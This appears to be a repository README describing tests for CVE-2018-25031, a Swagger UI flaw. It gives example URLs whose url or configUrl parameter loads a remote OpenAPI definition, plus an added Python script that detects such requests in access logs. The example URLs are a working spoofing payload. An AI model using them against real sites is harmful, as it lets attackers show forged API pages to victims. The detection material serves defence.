alamo21 / testswaggerxss

CVE-2018-25031 tests


CVE-2018-25031

CVE-2018-25031 exploit tests

Swagger UI before 4.1.3 could allow a remote attacker to conduct spoofing attacks. By persuading a victim to open a crafted URL, an attacker could exploit this vulnerability to display remote OpenAPI definitions.

HowTo

Find the Swagger UI documentation endpoint and append either a "configUrl" parameter pointing to test.json or a "url" parameter pointing to test.yaml, as in the example URLs below.

https://exemple.com/?configUrl=https://raw.githubusercontent.com/mathis2001/CVE-2018-25031/main/test.json
https://exemple.com/?url=https://raw.githubusercontent.com/mathis2001/CVE-2018-25031/main/test.yaml
https://exemple.com/swagger-ui/index.html?url=https://raw.githubusercontent.com/mathis2001/CVE-2018-25031/main/test.yaml
https://exemple.com/swagger-ui.html?url=https://raw.githubusercontent.com/mathis2001/CVE-2018-25031/main/test.yaml
https://exemple.com/api/swagger/index.html?configUrl=https://raw.githubusercontent.com/mathis2001/CVE-2018-25031/main/test.json
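The requests above leave a distinctive trace in web-server access logs: a hit on a Swagger UI path whose "url" or "configUrl" query parameter points at a host the application does not own. The following detection script is an added example for this page, not code from the repository; the log lines are constructed, and the list of Swagger UI path markers and the set of "own" hosts are assumptions that should be adjusted to the deployment being monitored.

```python
"""Flag access-log requests that ask Swagger UI to load a remote OpenAPI
definition (the CVE-2018-25031 pattern: a ``url`` or ``configUrl`` query
parameter pointing at a third-party host).

Added example for this page; not part of the repository. Log lines are
constructed, and SWAGGER_PATH_MARKERS is an assumption about where the
documentation endpoint is mounted.
"""
import re
from typing import Iterable, List, Optional, Set
from urllib.parse import parse_qs, urlsplit

# Path fragments on which Swagger UI is commonly served (assumption; extend
# for your application, e.g. add "/" if the UI is mounted at the site root).
SWAGGER_PATH_MARKERS = ("swagger-ui", "swagger-ui.html", "/swagger/", "/docs")

# Query parameters that Swagger UI (before 4.1.3, or with query config enabled)
# honours to override which definition it loads.
OVERRIDE_PARAMS = ("url", "configUrl")

# Combined-log-format request section: "METHOD target HTTP/x.y".
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample lines: one remote "url", one same-origin relative "url",
# one scheme-relative "configUrl", and one hit outside any Swagger UI path.
SAMPLE_LOG_LINES = [
    '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /swagger-ui/index.html'
    '?url=https://third-party.example/test.yaml HTTP/1.1" 200 1234',
    '198.51.100.2 - - [10/Oct/2023:13:56:01 +0000] "GET /swagger-ui/index.html'
    '?url=/v3/api-docs HTTP/1.1" 200 1234',
    '198.51.100.3 - - [10/Oct/2023:13:57:12 +0000] "GET /api/swagger/index.html'
    '?configUrl=//other.example/test.json HTTP/1.1" 200 1234',
    '198.51.100.4 - - [10/Oct/2023:13:58:00 +0000] "GET /index.html'
    '?url=https://third-party.example/x.yaml HTTP/1.1" 200 512',
]


def classify_request(target: str, own_hosts: Set[str]) -> Optional[dict]:
    """Return a finding dict if ``target`` asks Swagger UI to load a
    definition from a host not in ``own_hosts``; otherwise None."""
    parts = urlsplit(target)
    if not any(marker in parts.path for marker in SWAGGER_PATH_MARKERS):
        return None
    params = parse_qs(parts.query)  # percent-decodes values for us
    for name in OVERRIDE_PARAMS:
        for value in params.get(name, []):
            ref = urlsplit(value)
            # A relative reference such as "/v3/api-docs" stays on the
            # application's own origin and is the normal, benign case.
            if not ref.scheme and not ref.netloc:
                continue
            host = ref.hostname or ""
            # Absolute and scheme-relative ("//host/...") references to any
            # host we do not own are the pattern described on this page.
            if host not in own_hosts:
                return {"param": name, "remote_host": host, "path": parts.path}
    return None


def scan_access_log(lines: Iterable[str], own_hosts: Set[str]) -> List[dict]:
    """Run classify_request over every log line; attach the client address."""
    findings = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        finding = classify_request(match.group("target"), own_hosts)
        if finding:
            finding["client"] = line.split(" ", 1)[0]
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG_LINES, {"api.example.com"}):
        print(f"{hit['client']} -> {hit['path']} {hit['param']}={hit['remote_host']}")
```

Relative values such as "/v3/api-docs" are deliberately ignored because that is how a legitimate deployment points the UI at its own definition; only absolute or scheme-relative references to a host outside the allow-list are reported. If Swagger UI is mounted at the site root (as in the first two example URLs above), add "/" or the exact index path to SWAGGER_PATH_MARKERS, otherwise those requests are not inspected.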

Screenshots

[screenshot image not included in this copy]
